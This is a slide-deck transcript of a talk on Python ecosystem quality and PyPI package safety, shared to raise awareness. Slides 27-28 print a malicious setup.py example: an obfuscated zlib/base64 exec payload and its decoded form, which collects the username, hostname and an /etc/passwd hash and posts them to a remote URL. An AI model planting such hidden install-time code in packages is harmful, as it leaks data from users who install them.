Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

The quality of the python ecosystem - and how we can protect it!


Published on

The Python ecosystem is supported by some pillars that are

- community,
- theoretical material,
- tools,
- libraries,
- and language itself.

In this talk I would like to reflect on each of these pillars of the ecosystem
What are the priorities and in terms of quality what are the vulnerabilities of each of them.

I will mention the importance of all but focus on the quality of the ecosystem of libraries, tools and theoretical material.

The reflection will be around answering some questions:

- How to maintain the quality of libraries published in PyPI?
- What are the biggest vulnerabilities and how can we help avoid the risks?
- The importance of quality theoretical material (generated by the community)
- Can we trust everything that is available in PyPI?
- Are ecosystem teaching and documentation approaches safe, inclusive and easy to assimilate?
- What can we do to help solve the problems identified?

I will present some real cases and examples of problems encountered and security issues involving mainly PyPI

Published in: Technology
  • Be the first to comment

  • Be the first to like this

The quality of the python ecosystem - and how we can protect it!

  1. 1. The Quality of the Python Ecosystem Bruno Rocha - @rochaCbruno -
  2. 2. Bruno Rocha - @rochaCbruno Quality Engineer @ Podcaster @ Teacher @ Blogger @
  3. 3. Every Monday 10AM Podcast to listen on itunes, rss, players etc Every Wednesday 7PM YouTube live!
  4. 4. “An ecosystem is a community of living organisms in conjunction with the nonliving components of their environment (things like air, water and mineral soil), interacting as a system” -- Wikipedia
  5. 5. - You (and your groups) - Communities (meetups and conferences) - theoretical Material (books, tutorials, courses) - Tools(systems, IDEs, platforms) - Package library (pip, github, conda) - Python Software Foundation - The Language (core developers) Ecossistema Python?
  6. 6. What attracts so many people to Python?
  7. 7. - Python is easy to learn. - The community is receptive - It has really cool events. - It's easy to write and publish new libraries with Python. - You thought in something ... you already have it in PyPI. - It is popular and fashionable. - Approved by Large companies. $ pip install magic >>>
  8. 8. Or in the words of the Brazilian poet...
  9. 9. “In Python everything is object, it is also beautiful and wonderful.” (it makes more sense in Portuguese)
  10. 10. How to assure Software Quality? Enterprise ?
  11. 11. How to assure professional quality? ?Professional Python Certification! Became a professional for only $ 9.999,99 / year
  12. 12. How to assure the Quality of published libraries? ?Become “Python Developer Partner” Publish your libraries to “PyPI store” for only $ 9.999,99 / year PY
  13. 13. New Python 3.6 Featuring exclusive `f’string` Only $ 999/year You need Python 3.6 Call 555 - 5555 And buy it now! Oportunity: First 100 customers Will get IDLE for free...By Guido Inc.
  14. 14. Dude, how can you be so dumb?
  15. 15. ● Python has no owner, it belongs to the community. ● The community is quality control. ● The community is a certifying entity *. * In the Python community, EVERYONE are encouraged to participate and make a difference, collaborating with the various pillars of the community (slide 4) is of great value to the career of the Python professional.
  16. 16. YOU
  17. 17. “I came for the language but I stay for the community” - Brett Cannon
  18. 18. "Diversity happens when different people meet in one place" "Inclusion happens when these people can work together, as equals, with the same opportunities and without prejudice to any of them" - Naomi Ceder (Pycon Brasil 2016)
  19. 19. How to fight the community and diversity problems? - Code of conduct - Adopt a mentor's position, not a judge's.
  20. 20. Open by default - PSF (grants, membership, fellowship and board) - Repositories - Experiments (MyPy, Gilectomy) - APyB - Call 4 Papers - PyPI/Warehouse - Python Planet - PEPs - GruPys Você pode participar abertamente!!!
  21. 21. 100_000+ Libraries on PyPI
  22. 22. $ pip install magic >>> - Python is easy! - Lot of libraries available
  23. 23. >>> Traceback Cannot do the magic today... - How many of the 100_000+ has test coverage? - Good documentation? - How do I choose?
  24. 24. $ pip install magic $ installing… $ HAHA you got hacked!!! - Are all that libs safe? - Anyone can publish a new lib in PyPI in few minutes, who assure the safety?
  25. 25. Safety!!!
  26. 26. # `pip install magic` from setuptools import setup setup( name="magic", ... ) Always review source code of the libs you are installing. Specially `` Don’t forget the scrollbars.
  27. 27. ;import zlib; exec(zlib.decompress('eJx9UcFqxCAQvfsVXhYVtoY Wegn0uF+x7MHG2ShNHNEJ3aX036vJBrJQ4uX5HOfNe+rH iIk4ZuaXn3ZSGwX8+s7eVOpPdphoHQ1dMI2OU7i3jZU3 BjMA/iqDugQbsfZCKwa2DSPw0g8fATebw3CDOh3wRn/M Bho+YwU6mtc/R8Warz62VP8tH1r+K1RijFRxI92neJEYI UDVDXRJPztxVKJzBWKqUd3KzvIdN+nilV2O9MaMuVoeU JdAEKHFuSPmGOIdsl+5KIaLrRCYbNWoTP+qu3jLr9RtRb Pjii2TRPv5DC8BFNdnFcsJvyYTo+5wbMSRVyO77mtq9g fllKgCn'.decode('base64'))) Multiple of 4 white spaces Python tricks!
  28. 28. # `pip install magic` import os, urllib, urllib2, hashlib, platform try: uname = os.getlogin() except Exception as e: uname = '[%s]' % e try: host = platform.uname()[1] except Exception as e: host = '[%s]' % e try: fhash = hashlib.md5(open('/etc/passwd').read()).hexdigest() except Exception as e: fhash = '[%s]' % e data = urllib.urlencode({'uname': uname, 'host': host, 'fhash': fhash}) try: urllib2.urlopen('', data) except Exception as e: pass Decoded trick Nothing serious here But could be a real hack
  29. 29. Solution?
  30. 30. $ pip install safety $ safety check
  31. 31. Open Source Community driven safety checks? Please create more Safety tools!!!!
  32. 32. Why “The Python” dont fix this issues without depending on third party services?
  33. 33. New generation of PyPI is `warehouse` and you can help On Only 18 contributors?
  34. 34. Not a coder? donate!!!
  35. 35. Warehouse is a next generation Python Package Repository designed to replace the legacy code base that currently powers PyPI
  36. 36. Rank: 4.5 - safe Rank: 2.0 - outdated Rank: 1.0 - danger 1.234 Reviews ++ 1 Review --Why not making it more `social driven` to address the library quality problem? Example: More maintainers More quality points!
  37. 37. What to do about safety ? - Check before installing - Install known and trusted libraries - Use SafetyCI - - Create (and share) more tools to help with verification - Report if lib is suspected - Collaborate to the Pypa / Warehouse project
  38. 38. The responsability is YOURS OURS!!!
  39. 39. Every library published in PyPI comes with an invisible tag that says: "I am aware of the responsibilities that I must assume when I publish this code and I promise to do my best to keep it with quality until the end of time!" And I'll leave it explicit if for any reason I can not keep leaving the path clear For anyone wanting to create a fork!
  40. 40. That “one man project” is not so cool Maintanable: Project that can be maintable by as many and diverse people.
  41. 41. Leftpad is ` npm` problem, will not happen with Python?
  42. 42. pip install requests ● 99.9% of installations of Python environments install requests ● If the version is not specified your build may break ● Tools like Travis-Ci depend on requests and have already broken for this! ● Operating systems bring requests by default ● Until a few months ago this was a 'one man band' project, but after recent issues with releases the creator decided to exclude himself as administrator from the lib and elected other maintainers ● It is not the only one, there are other Python libs published with the same risk ● Always specify your versions ● Use or or any other solution of the type ● Use safety / IC or something
  43. 43. ….. Too many broken releases in a single day... TravisCi broke (even if you pinned the version) it was depending on requests itself. And backwards incompatible code was pushed. So the creator assumed the responsability and did the right thing! Thanks!!!
  44. 44. Safety and maintainability Are not the only problems!
  45. 45.
  46. 46. Just like we did recently, changing our testing culture. We need efforts to change our documentation culture!
  47. 47. Q: Why most libraries do not have good documentation? A: Writing documentation is a boring process! Q: Why is it boring? A: Non-friendlier tools and formats (rst) drive people away from the documentation. We need to do as we did with the tests and adopt easier formats (md?) and tools. (in other words we need a `py.test` for documentation. Q: How to encourage people to contribute documentation? A: First we need to define the process (as well as in the tests) and then create a manifesto attracting contributors, showing the importance, providing a certain status to the documenter, and using the events to foster that culture.
  48. 48. Tips to write good libs
  49. 49. Conclusion - Python is not a product! - The ecosystem (mainly the community) already has above average quality - We need more theoretical quality materials for beginners - Documentation is important we need to give it more focus - We can use tools to help in the QA of Python libraries - We can collaborate with the evolution of PyPI - We can collaborate with the evolution of Python - The quality of the ecosystem is OUR responsibility - Be responsible and publish only quality libraries in PyPI - We need a collaborative solution to classify 100,000+ libs - Collaborate!
  50. 50. Bruno Rocha - @rochaCbruno Quality Engineer @ Podcaster @ Teacher @ Blogger @